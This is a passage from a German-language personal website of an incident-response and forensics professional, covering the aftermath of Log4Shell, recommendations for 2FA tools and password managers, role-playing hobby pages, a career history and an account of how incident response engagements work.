Das gleichzeitig Spannende und auch Beängstigende an dieser Sicherheitslücke ist, dass nicht nur direkt aus dem Internet erreichbare Systeme betroffen sein konnten. Hatte man beispielsweise einen Webserver in der DMZ stehen, der seine Logdateien erst einmal lokal wegschrieb, und im internen Netzwerk einen Logging-Server auf Java-Basis, der diese dann einsammelte und auswertete, konnten die vergifteten Log-Einträge auch problemlos Systeme hinter etablierten Sicherheitsbarrieren erreichen. Vom Auskundschaften interner Netze über Manipulation von Daten (oder gar dem Ausrollen von Ransomware) bis hin zum Abfluss geschützter Daten war alles denkbar.

Viele Betroffene, wenig Auswirkung?

Bis auf ein paar bekannt gewordene Fälle (so wurden das Belgische Verteidigungsministerium und die Webseite des Bundesfinanzhofs auf diese Weise angegriffen, zudem liefen auf einigen Servern kurzzeitig fremdkontrollierte Krypto-Miner) geschah bis zur Verfügbarkeit der Patches ab dem 10.12.2021 eher wenig. Betroffen waren unter anderem viele der bekannten Cloud-Anbieter, die jedoch bereits vor der Verfügbarkeit der Patches in Eigenregie ihre Systeme so abdichteten, dass die Sicherheitslücke nicht ausgenutzt werden konnte. Auch einige andere Tech-Giganten beeilten sich, ihre Systeme abzusichern, bis wirksame Patches verfügbar waren.

Doch hunderttausende Systeme blieben weiterhin verwundbar. Gerade IoT-Geräte, die gerne auch mal offen im Internet erreichbar sind und nur selten oder gar nicht mit neuer Software betankt werden, blieben betroffen. Hierzu zählen unter anderem viele “smarte” Geräte wie Smart-TVs, Smarthome- und Industriesteuerungssysteme. Hinzu kommt, dass log4j von den Softwareanbietern selbst auf eine fehlerbereinigte Version aktualisiert und erneut in ihre Projekte eingebunden werden muss. Endanwender und selbst Administratoren haben in der Regel nur wenig Möglichkeiten, ihre Java-Anwendungen selbstständig auf einen aktuellen Stand zu patchen. Hinzu kommt, dass gerade bei embedded und IoT-Geräten kaum eine Möglichkeit besteht, sich zu vergewissern, dass auf dem System nichts verändert und ein Angreifer sich nicht für einen möglichen späteren Zeitpunkt eine Hintertür eingerichtet hat. Und mit “später” meine ich ggf. Jahre, nicht Wochen.

Dunkelziffern und schlafender Code

Wie viele Systeme heute noch verwundbar sind lässt sich schwer sagen. Von aktuell verfügbarer Software, die log4j einsetzt, ist auch heute (Stand Ende 2023) noch gut ein Drittel verwundbar, da die entsprechenden Bibliotheken nicht auf den neuesten Stand gebracht wurden. Der Großteil dieser Software setzt dabei die Version 1.2.x von log4j ein, die bereits 2015 ihr letztes Update erhalten hat und damit inzwischen bald 10 Jahre EOL (end of life) ist. Die Entwickler scheint’s derweil nicht zu stören.

Und auch wie viele Systeme still vor sich hinschlummern, die infiziert wurden, bevor sie einen Patch (wenn überhaupt) erhielten, ist unbekannt. Viele Experten gingen zu Log4Shell-Hochzeiten davon aus, dass nach einigen Monaten Ruhe viele Auffälligkeiten zutage treten dürften, die auf reaktivierte Systeme zurückzuführen sind. Bisher ist davon nichts, zumindest nichts, was öffentlich bekannt geworden wäre. Doch wenn man sich die Zeit anschaut, die sich einige Kriminelle nehmen, möchte ich an dieser Stelle nicht ausschließen, dass uns in Zukunft noch die eine oder andere Überraschung mit Bezug auf Log4Shell erwartet.

2FA / MFA

Mehr Accountsicherheit durch Besitz

2FA (2-factor authentication) bzw. MFA (multi-factor authentication) steht für Methoden, die zusätzlich zu Benutzernamen und Passwort (Wissen) noch einen weiteren Faktor (Besitz) zu einer Anmeldung hinzufügen. Es gibt verschiedenste MFA-Arten, die gängigen sind derzeit vor allem durch eine App oder ein Hardware-Token generierte Zahlenreihen (meistens sechs bis acht Ziffern), QR-Codes oder neuerdings Passkeys, die das Gerät selber als zweiten Faktor verwenden.

Ich möchte an dieser Stelle vorerst nicht die technischen Hintergründe der verschiedenen Methoden beleuchten, die Vorteile all jener Methoden liegen aber auf der Hand: Während man Passwörter auslesen, mitschneiden oder erraten kann, fällt das bei über ein separates Gerät generierte Tokens sehr viel schwerer. Viele Anbieter von Web-Diensten erlauben inzwischen, einen 2. Faktor hinzuzufügen, vor allem bei Passwortmanagern und Webmail-Diensten sowie Verwaltungszugängen sollte die entsprechende Option meiner Meinung nach verpflichtend sein.

Nun gibt es gerade für 2FA-Generatoren auf dem Handy diverse Apps, die entsprechende Funktionen bieten. Doch es gibt Stolpersteine, vor allem, wenn die entsprechenden Apps die 2FA-Token in die Cloud synchronisieren (bei Apple teilweise nicht einmal deaktivierbar) oder keinen Export der gespeicherten Accounts erlauben (z.B. Authy).

Empfohlene 2FA-Generatoren

Auch hier komme ich nicht umhin, konkrete Empfehlungen auszusprechen. Leider gibt es zu viele Apps, die hohe Sicherheitsanforderungen nicht erfüllen oder den Wechsel zu einer anderen App erschweren, was für mich ein Ausschlusskriterium darstellt.

Leider kann ich für Apple-Geräte keine Empfehlungen aussprechen, da ich diese weder privat noch in ausreichendem Umfang beruflich verwende. Im zweifel ergänze ich diese Seite zu einem späteren Zeitpunkt dennoch.

OTP (Zahlencodes)

Empfehlung: Aegis (Play Store / f-droid)

Aegis beherrscht die üblichen Methoden, 2FA-Tokens zu generieren. Zudem lassen sich dort abgelegte Accounts auch exportieren, um sie mit anderen Geräten abzugleichen oder Backups anzulegen, unter anderem kann man damit auf die eigene Nextcloud-Infrastruktur sichern. Die Unabhängigkeit von den Google Play-Diensten ermöglicht den Betrieb auch auf Geräten ohne diese auf gerooteten und von Google befreiten Geräten.

Hardware-Keys

Empfehlung: Nitrokey

Der Berliner Hersteller Nitrokey GmbH stellt eine Alternative zum bekannten YubiKey her, die vor allem mit der exportierbaren Firmware besticht. Dies ermöglicht es, mit ausreichendem Fachwissen selber zu überprüfen, was genau an Software auf dem gerät läuft und ob sie dem entspricht, was der Hersteller verspricht - ein Alleinstellungsmerkmal. Zudem gibt es Nitrokeys mit allen möglichen USB- und Lightning-Anschlüssen und NFC - damit sind sie wirklich universell einsetzbar. Der aktuelle NitroKey 3 unterstützt zudem die Anmeldung nach den Standards FIDO2, U2F und Passkeys und ist damit kompatibel mit den meisten Onlinediensten, die die Anmeldung mit Hardware-Tokens erlauben. Auch die Anmeldung am eigenen Betriebssystem ist damit möglich. Die Nitrokeys können noch einiges mehr, schaut dafür einfach direkt auf der Herstellerseite vorbei.

Passkeys

Empfehlung: Keine

Passkeys werden aktuell von allen gängigen Betriebssystemen implementiert und bieten eine bequeme Art, den FIDO2-Standard ohne Zusatzgerät einzusetzen. Als zweiter Faktor wird das aktuelle Gerät verwendet, auch einige Passwortmanager (wie z.B. der empfohlene BitWarden) bieten inzwischen an, sich als Passkeys-Gerät zu registrieren. Die Vorteile liegen auf der Hand: Man braucht kein zweites Gerät mehr, um sich anzumelden. Die Nachteile sind dieselben, man benötigt kein zweites Gerät mehr. Passkeys zu “entführen” ist zwar eine riesige Hürde und in manchen Fällen nahezu unmöglich, jedoch kann ein Angreifer mit Kontrolle über Dein Gerät auch die Passkeys dieses Gerätes zur Anmeldung nutzen - es gibt also nur noch einen halben zweiten Faktor, bestenfalls.

Aus diesem Grunde empfehle ich die Verwendung von Passkeys nicht, solange die anderen 2FA-Methoden eine gangbare Option sind. Sicherer sind sie allemal, wenn auch minimal weniger bequem. Aber glaube mir, man gewöhnt sich unglaublich schnell daran.

Passwortmanager

Passwort-was?

Dass man nicht für jeden Dienst dasselbe Passwort verwenden soll, ist bekannt. Weniger bekannt ist, dass es nur bedingt hilft, wenn man Variationen desselben Passworts hilft. Ich lese häufig Tipps wie “Nimm ein Basis-Kennwort und hänge für jede Seite, wo Du es verwendest, den Seitennamen an”. Klingt in der Theorie gut, aber es ist tatsächlich ziemlich unsicher. Denn hat ein Angreifer ein Passwort wie “M1Sup3rs1ch3r3sP@ssw0rt_google.de” ausgespäht, kann er sich gleichzeitig auch alle anderen passwörter herleiten. Den statischen Teil kennt er, den dynamischen quasi auch.

Sicherer ist es, einen Passwortmanager zu benutzen und im besten Fall die Passwörter auswürfeln, also zufällig erzeugen zu lassen. Die meisten modernen Passwort-Manager unterstützen das und bieten es teilweise sogar proaktiv an. Allen gemein ist es, dass sie Möglichkeiten bieten, sich im Browser oder auf dem Handy via App einzubinden und automatisch die benötigten Passwörter auszufüllen. So muss man sich nur noch ein einziges, starkes Passwort (das Master-Kennwort) für den Passwort-Safe merken und nicht mehr.

Nun mag man sich fragen: Ist denn ein einzelnes Passwort, das abhanden kommen kann, dann nicht der single point of failure? Was passiert, wenn man dieses Passwort verliert bzw. es gestohlen wird? Dann hätte jemand Zugriff auf alle anderen Passwörter. Das ist sicher eine korrekte Annahme, doch dafür gibt es zusätzliche Sicherheitsmechanismen, die zum einen auf Anbieterseite als auch auf dem eigenen Gerät greifen.

Als wichtigste wäre hier 2FA / MFA zu nennen, womit man zusätzlich zum Benutzernamen und Kennwort noch einen zweiten Faktor, beispielweise eine von einer App generierten Zahl, benötigt. Ein Angreifer könnte mit dem Passwort alleine nicht viel anfangen. Viele Anbieter überwachen zudem die Anmeldung von unüblichen Ländern aus; wenn Du Dich bisher immer aus Deutschland auf den Servern angemeldet hast, plötzlich aber Logins aus Bolivien, Australien und Norwegen stattfinden, wird der Anbieter Dich via E-Mail informieren und im besten Fall den Zugang vorübergehend sperren, bis Du Verifikationsschritte unternommen hast. Das gilt natürlich nur für Online-Passwortmanager, die sich jedoch aufgrund der geräteunabhängigen Verfügbarkeit großer Beliebtheit erfreuen.

Die Wahl zwischen Online- und Offline-Passwortmanagern mag gerade sicherheitsbewussten Nutzern schwer fallen. Der Online-Passwortmanager wird auf den Servern des Betreibers betrieben und man muss sich darauf verlassen, dass dessen Sicherheitsmaßnahmen ausreichen, um Angriffe abzuwehren und selbst bei einer Übernahme der eigenen Server durch Angreifer die Nutzerdaten zu schützen. Das ist eine komplexe Thematik und die Anbieter erlauben Nutzern in der Regel nicht, die eigene Infrastruktur zu überprüfen. Die meisten Nutzer hätten so oder so nicht das notwendige Fachwissen dafür. Blieben noch Offline-Passwortmanager, die auf dem lokalen PC oder Handy laufen und Daten nicht in der Cloud, also auf fremden Servern speichern. Problematik hier: Man muss die Datenbank irgendwie auf alle Geräte synchronisieren, die auf die Passwörter zugreifen sollen. Das wiederum ist schwieriger als es klingt, vor allem, wenn man nicht den Weg über die Synchronisation auf einem Server gehen möchte.

Für Nutzer, die sich ausreichend gut mit Serversicherheit und Betriebssystemen auskennen, gibt es die Möglichkeit, selber einen Passwort-Server zu hosten. Das kann sogar zu Hause auf einem Raspberry Pi oder einem Mini-Server sein, so dass man keinen angemieteten Server bei einem der verfügbaren Hoster benötigt. Hier ist die Schwelle das Fachwissen des Nutzers. Und selbst Menschen, die sich gut auskennen, können durchaus Fehler bei der Absicherung ihrer Server machen. Ein Team von Administrator*innen und Sicherheits-Fachleuten bei einem Anbieter von Online-Passwortmanagern hat hier in der Regel tatsächlich bessere Möglichkeiten.

Empfehlungen

Was wären also meine Empfehlungen für brauchbare Passwort-Manager? Es gibt viele Vergleiche und Artikel dafür im Internet, auf die ich lieber verweisen würde, aber ich habe tatsächlich ein paar Favoriten:

Offline-Passwortmanager

Ganz klar: KeePassXC!

KeePassXC ist für alle gängigen Betriebssysteme verfügbar, beherrscht die Synchronisation der verschlüsselten Passwort-Safes über gängige Cloud-Austauschdienste wie DropBox, OwnCloud, etc. und ist kostenlos zu haben und vor allem Open Source. Auch Browser-Plugins gibt es, um Zugangsdaten automatisch mit dem Browser zu synchronisieren.

Online-Passwortmanager

Mein Favorit: Bitwarden

Bitwarden ist wie KeePassXC (und dessen Original, KeePass) Open Source, für alle gängigen Betriebssysteme verfügbar und in der Grundversion ebenfalls kostenlos. Es bietet umfangreiche Sicherheitsoptionen, unter anderem 2FA-Anmeldung, mit der kostenpflichtigen Premium-Variante noch einige mehr. Unter anderem werden Passwörter auch gegen diverse Listen von bekannten abgeflossenen Passwörtern abgeglichen und übersichtlich dargestellt, welche Einträge als unsicher gelten und dringend aktualisiert werden sollten. Die Daten werden angeblich so auf dem Server abgelegt, dass der Betreiber keinen Zugriff auf die Passwörter hat, was sich jedoch nur schwer überprüfen lässt. Ein wenig Vertrauensvorschuss ist hier daher wie bei allen Online-Anbietern notwendig.

Online-Passwortmanager (selbstbetrieben)

Empfehlung für Profis: Vaultwarden

Wer jetzt aufmerksam wird und sich fragt, ob Vaultwarden irgendwie aufgrund des ähnlichen Namens mit Bitwarden verwandt ist, hat den richtigen Riecher. Vaultwarden ist der durch die Community weiterentwickelte Spinoff von Bitwarden, der teilweise vom Mutterprojekt (noch) nicht unterstützte Methoden mitbringt und darüber hinaus auch selbst gehostet werden kann. Kostenlos, versteht sich. Der grundlegende Funktionsumfang entspricht dem von Bitwarden, daher erspare ich Dir hier die erneute Aufzählung der Features.

Rollenspiele

rpg

Das erste echte Rollenspiel (in seiner Form als CRPG) habe ich wohl als Kind auf dem C64 mit “Zauberschloss” gespielt. Seitdem hat mich die Faszination für phantastische Welten nicht mehr losgelassen. Lest hier über meine Erfahrungen mit verschiedenen Rollenspielen und meinen Versuchen, eigene Welten zu erschaffen.

Unterabschnitte von Rollenspiele

Dungeons & Dragons (WIP)

dnd

Quasi der Urvater aller modernen Rollenspiele. D&D begeistert Alt und Jung weltweit und diverse Werke von Büchern bis hin zu Computerspiel-Adaptionen fluten den Markt.

Weitere Inhalte folgen

Shadowrun (WIP)

shadowrun

Stellt euch eine moderne Welt in naher Zukunft (2011 hust) vor, in der die Magie zurückgekehrt ist. Neben allerlei Fabelwesen treiben sich auch technisch verbesserte Menschen in den Cyberpunk-Metropolen herum. Willkommen bei Shadowrun!

Weitere Inhalte folgen

Vampire: the Masqerade (WIP)

vampire

Vampire: the Masquerade handelt, wie der Name schon erahnen lässt, von Vampiren und ihrem Kampf ums Überleben in den dunklen Ecken der Städte dieser Welt.

Weitere Inhalte folgen

Weltenbau (WIP)

worldbuilding

Eines meiner großen Hobbies ist der Weltenbau. Ich vertreibe mir die Zeit mit der Erstellung von Kartenmaterial, von Battlemaps und Weltenbeschreibungen für mögliche zukünftige Rollenspielprojekte. Seit kurzem kommt noch KI-unterstützte Bildgenerierung dazu.

Weitere Inhalte folgen

Unterabschnitte von Berufliches

Schwerpunkte

emphasis Meine beruflichen Schwerpunkte drehen sich derzeit um IT-Sicherheit auf allen Ebenen. Aber auch die Schwerpunkte vergangener Zeiten möchte ich hier der Vollständigkeit halber festhalten.

Incident Response

Seit einigen Jahren arbeite ich hauptsächlich innerhalb des IR-Teams der HiSolutions. Erste Einsätze bei gehackten Unternehmens-Infrastrukturen absolvierte ich zwar schon, bevor die entsprechende Abteilung überhaupt als solche existierte, doch nur sporadisch und neben meiner eigentlichen Tätigkeit. Im Gegensatz dazu vergeht heute keine Woche ohne Einschläge, bei denen die Kollegen teils quer durch die Republik fahren, um das Schlimmste zu verhindern. Und auch wenn ich vorübergehend in den operativen IT-Betrieb gewechselt bin, um mit meinen Kollegen eine leistungsfähige und sichere Infrastruktur aufzubauen, brennt mein Herz nach wie vor für den Thrill vor Ort, wenn die IT sprichwörtlich brennt und die Nerven beim Kunden blank liegen.

Blank liegende Nerven sind hier ein gutes Stichwort. Incident Response ist zur Hälfte Management und zur Hälfte Seelsorge. Während man mit einer Hirnhälfte versucht, den Schaden zu erfassen, geeignete Gegenmaßnahmen einleiten zu lassen, schon einmal die verfügbaren Dienstleister durchgeht, benötigte Ansprechpartner und gesetzliche Vorgaben vor dem inneren Auge vorbeiziehen lässt und generell eine Schadensaufnahme vorbereitet, arbeitet die andere Hirnhälfte mit Hochdruck daran, die Kontaktpersonen beim Kunden zu beruhigen und sie auf ein managebares Stresslevel herunter zu bekommen. Und da fragt sich mancher, wieso wir meistens im Team anrücken…

Forensik

Forensik ist neben der Incident Response meine zweite große Leidenschaft. Das kleinteilige Suchen nach Hinweisen, das Nachverfolgen von Datenspuren und die teilweise überraschenden Ergebnisse faszinieren mich. Es gibt wenige Arbeiten, auf die ich mich den ganzen Tag konzentrieren kann, ohne davon erschöpft zu sein. Das digitale Wimmelbild, das sich bei einer forensischen Untersuchung offenbart, stellt hier eine große Ausnahme dar.

Ob es die Analyse während eines IR-Vorfalls ist, eine vermutete Straftat eines Mitarbeiters oder einfach nur ein verdächtiges Verhalten eines Gerätes - keine Untersuchung ist wie die andere und der Lernprozess hört nie auf.

Pentesting

Als Penetrationstester bin ich bei der HiSolutions 2016 eingestiegen. Ich war mehr oder weniger Quereinsteiger, hatte in diesem Bereich nur privat ein wenig Erfahrung gesammelt und so erwartete mich eine steile Lernkurve. Die ersten Pentests gemeinsam mit Kollegen fühlten sich noch seltsam an, griff man doch quasi mit Erlaubnis des Kunden seine Systeme an. Doch der Spieltrieb und die fachliche Herausforderung siegten und ich durfte so einige spannende Unternehmen von einer Seite kennenlernen, die anderen wohl immer verborgen bleiben wird.

Netzwerk-Administration

Ich bin ausgebildeter Netzwerk-Administrator, damals mit Schwerpunkt auf Cisco-Infrastruktur, doch mit den Jahren habe ich mit vielen anderen Herstellern gearbeitet. Und auch wenn ich heute beruflich nicht mehr oft direkt an Switchen und Firewalls konfiguriere, hilft mir dieses Wissen bei den meisten EInsätzen sehr. Einen Netzplan ad hoc lesen und verstehen sowie Firewallregeln auf ihre Wirksamkeit beurteilen zu können ist ein großer Vorteil. Gerade, wenn es heiß her geht und die Köpfe derer, die die entsprechende Infrastruktur betreuen, gerade jenseits von gut und böse sind.

BCM

Im Rahmen der Incident Response durfte ich auch diverse Male in den Bereich BCM (Business Continuity Management) hereinschnuppern, mit den Kunden entsprechende Pläne erarbeiten und bisher getroffene Maßnahmen auf Wirksamkeit und Angemessenheit beurteilen.

Ich bilde mir nicht ein, ein Experte auf diesem Gebiet zu sein, aber das Grundwissen, das ich in den letzten Jahren erlangt habe, leistet mir und meinen Kunden wertvolle Dienste.

Programmierung

Eher ein Steckenpferd als Schwerpunkt ist die Programmierung. Administrator wollte ich damals nicht sein, ich wollte Anwendungsentwickler werden! Das mangelnde Angebot an Ausbildungsstellen hat mich trotzdem in die Systembetreuung getrieben, doch programmieren tue ich immer noch gerne.

Heutzutage nutze ich diese Leidenschaft hauptsächlich, um die Firmen-Infrastruktur mit umfangreichen Scripten zu automatisieren und den Mitarbeitern Hilfestellungen an die Hand zu geben, die Abläufe vereinheitlichen und die Fehleranfälligkeit senken. Derzeitiges tool of the trade: bash!

Stationen

stations Über die Jahre haben sich eine Handvoll Arbeitgeber angesammelt, bei denen ich interessante und lehrreiche Jahre verlebt habe. Ich bin allen dankbar für die Erfahrungen, die ich dort machen durfte, auch wenn es mich teilweise schon nach kurzer Zeit zu neuen Ufern trieb.

HiSolutions AG, Berlin

Seit 2016 habe ich von Pentests und Incident Response über BCM-Grundlagen und Infrastruktur-Entwicklung schon so einige Fachbereiche kennengelernt und habe jeweils das beste daraus für mich mitgenommen. Speziell die Notfall-Einsätze im IR-Bereich machen immer eine Menge Spaß und haben ein enormes Lernpotenziel - für meine Kunden wie auch für mich.

Die HiSolutions AG ist dabei nicht nur fachlich ganz vorne mit dabei. Auch auf menschlicher Ebene wird das WIR groß geschrieben. Ich habe hier viele tolle Kollegen kennengelert und echte Freunde gefunden, die auch außerhalb der Firmenwelt ein wichtiger Teil meines Lebens geworden sind.

Ich bin glücklich, ein Teil dieser Firma zu sein und meinen Teil zum Erfolg beitragen zu dürfen. Awesome!

awesome current employer hacker’s choice fair working conditions

OpenLimit SignCubes GmbH, Berlin

Meine erste Station nach dem Umzug nach Berlin. Ich bin in der Qualitätssicherung für ein Java-basiertes Projekt eingestiegen, doch alle Beteiligten (mich eingeschlossen) merkten mit der Zeit, dass ich dort eine Fehlbesetzung war. Bei der Implementierung von Firewalls für Smartmeter Gateways und Gematik-Konnektoren fühlte ich mich als alter Netzwerker dann deutlich wohler und verbrachte meine restliche Zeit mit dieser Tätigkeit.

abat AG, Bremen

Mit bald Ende 20 entschloss ich mich, doch einmal eine Ausbildung zu machen, um “etwas auf dem Papier” zu haben. Die abat AG bildete Fachinformatiker für Systemintegration aus und ich bekam den Zuschlag. Es folgten drei Ausbildungsjahre, die eher durch die spannenden Aufgaben im SAP-, Windows- und Netzwerkadministrationsumfeld hervorstachen als durch neu Gelerntes - ich hatte durch mein langjähriges privates Interesse für everything IT einen gewissen Vorsprung, der mir gewisse Freiheiten in Bezug auf Lerndisziplin erlaubte.

Nach der Ausbildung blieb ich noch drei Jahre in der IT-Abteilung und unterstützte neben dem Tagesgeschäft die nächste Generation von Administratoren bei ihrer Ausbildung. Letztlich zog es mich aber weg aus Bremen und ich landete unerwartet in Berlin. SAP habe ich übrigens nie wieder angefasst und habe nicht vor, das zu ändern…

Selbstständigkeit

Ich hätte es besser wissen sollen. Nach einem Jahr war mir restlos klar, dass ich nicht für die Selbstständigkeit, auch nicht im IT-Sektor, gemacht bin. Reden wir nicht mehr drüber.

can’t recommend

Medion AG / AMS GmbH

Ein dreijähriger Zwischenstopp in Essen bescherte mir meinen ersten Job in einer Hotline. Medion bzw. AMS, die die Medion-Hotline betrieben, suchte fähige Techniker und boy, war ich fähig! In meiner Zeit zwischen Headset und Testrechnern lernte ich vor allem, dem Kunden am Telefon nicht alles direkt zu glauben, was er erzählte, sondern zu erahnen, was er tatsächlich auf dem Bildschirm stehen haben könnte. Auch mein Umgang mit Menschen am anderen Ende der Leitung, egal wie sie ticken, wurde hier geschärft und ich bin am Ende um sehr viele wertvolle Erfahrungen reicher in meine Heimat zurückgezogen.

SLZ Quickborn gGmbH

Mein offizieller Berufseinstieg erfolgte als Administrator bei der SLZ, nachdem ich einige Monate in deren Räumlichkeiten Einsteiger- und Fortgeschrittenenkurse im Office- und Windows-Umfeld für Kinder, Erwachsene und Senioren gegeben hatte. Die Stelle wurde überraschend frei und ich hatte schneller einen Arbeitsvertrag in der Hand als ich den Mund wieder zuklappen konnte. Quasi irekt von der Schule in die Wirtschaft, das hätte ich mir nicht träumen lassen. Leider wurde die Firma nach wenigen Monaten abgewickelt, was mich schließlich aus der Heimat weg nach Essen führte.

Links

links Viel habe ich in den Jahren nicht veröffentlicht, erst nach der heißen Phase der Corona-Pandemie habe ich mich wirklich getraut, auch öffentlich sichtbare Artikel außerhalb der internen Dokumentations-Blase meines Arbeitgebers zu schreiben. Die wenigen Artikel verlinke ich hier.

2024: Writeup zu SMTP Smuggling

Ein Vortrag auf dem letzten Chaos Communication Congress, der zum Jahreswechsel 2023/24 endlich wieder in Hamburg stattfinden durfte, sorgte für Zündstoff. Nicht nur, weil E-Mails offenbar durch böswillige Dritte nahezu beliebig gefälscht werden konnten, wobei einige bisher als brauchbar angenommene Sicherheitsmaßnahmen ausgehebelt werden konnten. Zudem gab es aufgrund der etwas komplexeren Thematik auch reichlich Verständnisprobleme. Ich habe versucht, die Thematik verstänblich aufzuarbeiten.

https://research.hisolutions.com/2024/01/smtp-smuggling-fallout-oder-wer-muss-jetzt-eigentlich-was-patchen/

2023: Artikel über unerwartet erwartbare XSS-Schwachstellen

Leider scheinen Sicherheitslücken wie XSS (Cross-Site-Scripting) auch im Jahre 2024 nicht totzukriegen zu sein. Es gibt immer noch Entwickler, die sich zu denken scheinen, dass Daten von fremden Systemen schon nicht gefährlich sein werden. Falsch gedacht, I present to you:

https://research.hisolutions.com/2023/04/xss-auf-abwegen/

2020: Security-Advisory zur Citrix-Schwachstelle CVE-2019-19781 (“Shitrix”)

2020 war auch für uns bei der HiSolutions ein ereignisreiches Jahr. Nicht zuletzt wegen einer in der Breite ausgenutzten Citrix-Schwachstelle, die viele Angreifer schneller ausnutzten, als die zuständigen Administratoren ihren Patchzyklus angepasst hatten. Die Folge: Glühende Hotlines, Notfallhilfe, Forensik satt. Über verschiedene Kanäle verbreiteten wir Informationen, wie die Schwachstelle beseitigt und die Systeme auf Kompromittierungen geprüft werden konnten.

https://www.hisolutions.com/detail/ransomware-angriffe-als-folge-von-shitrix

Forensik (WIP)

forensics

In der IT-Forensik habe ich gelernt, auch das komplett Unerwartete und Unwahrscheinliche als Möglichkeit nicht auszuschließen. Ich möchte euch einige kuriose Erkenntnisse und Fallstricke auch hier nicht vorenthalten.

Weitere Inhalte folgen

Incident Response

ir

Incident Response - wenn beim Kunden die IT unkontrolliert herunterbrennt, können Incident Response-Teams in vielen Fällen helfen, die Brandherde zu löschen und die Panik in Momentum verwandeln.

Feuerwehreinsatz ohne Löschschlauch

Feuerwehr-Vergleiche bieten sich bei den meisten Incident Response (IR) Einsätzen an: Man löscht schwelende Feuer in der Infrastruktur, sucht in abgebrannten Servern nach überlebenden Datenfragmenten, zieht noch nicht brennende Systeme aus dem Gefahrenbereich heraus, betreut die betroffenen Mitarbeiter und koordiniert die Zusammenarbeit mit Dienstleistern, Behörden und anderen Rettungsstellen wie der Polizei, dem LKA oder auch mal dem BKA.

Natürlich reist ein IR-Team nicht mit Blaulicht im roten Drehleiterwagen an, auch wenn einige Betroffene sich das alleine wegen der Signalwirkung “jetzt passiert was!” sicher wünschen würden - der psychologische Effekt wäre bestimmt deutlich messbar. In meinem / unseren Fall würden jedoch immerhin mindestens eine Handvoll Menschen, teilweise im Anzug, teilweise in Alltagskleidung, vor der Türe stehen, schwere Koffer mit Ausrüstung im Gepäck, und sich als das angeforderte IR-Team vorstellen. Dann geht es aber ähnlich wie bei Feuerwehr- und Polizeieinsätzen weiter: Lageerfassung, Krisenstabsräume bereitstellen und Krisenstäbe definieren (beides sofern noch nicht durch den Kunden bereits geschehen), Identifizierung von aussage- und weisungsberechtigten Personen. Das technische Team baut die Analyse-Infrastruktur auf und checkt gemeinsam mit den technischen Ansprechpartnern die Lage, während das Krisenmanagement-Team sich Vorstände und Abteilungsleiter greift und sich daran macht, notwendige Maßnahmen zu definieren und umzusetzen, die aus kommunikationstechnischer und rechtlicher Sicht notwendig sind.

Krisenmanagement in a nutshell

Ohne an dieser Stelle zu tief ins Detail zu gehen (immerhin verdienen wir mit diesem Wissen unser Geld), gibt es viele Fallstricke, die ein Unternehmen oft nicht in Gänze auf dem Schirm hat. Informationspflichten und Deadlines in Richtung Kunden, Mitarbeitern, Geschäftspartnern und Behörden, die sich je nach Unternehmen stark unterscheiden können. Außerdem die Erfassung von betroffenen Geschäftsprozessen und deren Abhängigkeiten, von SLAs und anderen Vereinbarungen mit Geschäftspartnern und Kunden, die man aufgrund des Ausfalls möglicherweise nicht einhalten kann und vieles mehr.

Ein weiterer Faktor, den viele beim Begriff “Krisenmanagement” nicht direkt im Kopf haben werden, sind die Mitarbeiter selbst. Ein Vorfall, der einen IR-Einsatz auslöst, ist in den meisten Fällen für alle Beteiligten sehr stressigcitation needed. Eine Freundin sagte mir einmal “Stress macht leistungsfähig - aber dumm” und hätte es damit nicht besser treffen können. Wer sinnvolle Entscheidungen in einer Krisensituation treffen muss, sollte möglichst einen Zustand erreichen, in dem der Stress möglichst niedrig ist. Leicht gesagt, zugegeben. Doch auch das ist Teil des Krisenmanagements. Im Zweifel heißt das auch: Mitarbeiter sinnvoll beschäftigen, damit überhaupt nicht erst das Gefühl aufkommt, im Leerlauf zu sein; Führungskräften und Entscheidern Überblick und eine positive Aussicht zu verschaffen.

Ran an die Server - nur gucken, nicht anfassen!

Okay, die Überschrift ist etwas irreführend. Generell gesprochen werden die meisten IR-Teams heutzutage nicht von einem Systemhaus gestellt, sondern über eigenständige Firmen, die sich mit IT-Sicherheit beschäftigen oder sich gänzlich auf IR spezialisiert haben. Von Zeit zu Zeit hat man sogar die Möglichkeit, Mitarbeiter des Bundesamtes für Sicherheit in der Informationstechnik (BSI) im Haus zu haben, die bei der Wiederherstellung der Betriebsfähigkeit unterstützen - ich würde trotz der durchweg positiven Erfahrungen dazu raten, dennoch möglichst darauf zu verzichten, in entsprechende Situationen zu kommen.

Als IR-Team sind wir in der Regel beratend unterwegs. Wir richten keine Server ein, wir legen keine Netzwerkkabel und wir konfigurieren nicht die Firewall. Das ist Aufgabe der entsprechend fachlich zuständigen Mitarbeiter und Dienstleister, deren Bemühungen wir koordinieren und Hilfestellungen bei der korrekten Umsetzung der Maßnahmen geben. Natürlich kommt es von Zeit zu Zeit trotzdem einmal vor, dass wir Zugänge zu Firewalls oder SIEM-Systemen bekommen, um Logdaten und Auswertungen selbstständig zu ziehen, aber die Regel ist das nicht - und soll es auch nicht sein.

Des Weiteren unterstützen die technischen Experten das Krisenmanagement-Team bei der Erfassung technischer Abhängigkeiten und realistischen Wiederherstellungszeiten für die Planung auf der nächsthöheren Ebene. Die beiden Teams arbeiten Hand in Hand, um Blocker möglichst zeitnah ausfindig zu machen und entsprechend schnell gegensteuern zu können. Oft betreuen Krisenmanager und “Techies” auch separate Krisenstäbe, die sich dann im Nachgang koordinieren. Dabei wird versucht, die entsprechenden Krisenstäbe so klein wie möglich zu halten und von dort aus Aufgaben zu delegieren, denn nichts hemmt eine Entscheidung mehr als zu viele Entscheider, die alle erst einmal alles durchdiskutieren wollen.

Um Geräte zu identifizieren, die kompromittiert oder auf andere Art in den Vorfall eingebunden sind, müssen teilweise viele Daten untersucht werden, Hierfür werden in der Regel mit forensischen Tools Abbilder der entsprechenden Datenträger erstellt, die dann auf unseren eigenen Systemen vor Ort oder remote untersucht werden können. Ab und zu müssen Daten von solchen Abbildern wieder bereitgestellt werden, ab der Prüfung und Übergabe der Daten endet aber auch wieder unsere Zuständigkeit. Generell versuchen wir, eine befallene Infrastruktur als solche nach Möglichkeit offline zu nehmen und mit frischen Systemen den Betrieb wiederherzustellen. Das ist nicht immer vollumfänglich möglich, hier finden sich dann andere Lösungen, um eine weitere Gefährdung von Infrastruktur, Daten und Menschen so weit wie möglich einzudämmen.

Wann sind die endlich wieder weg?

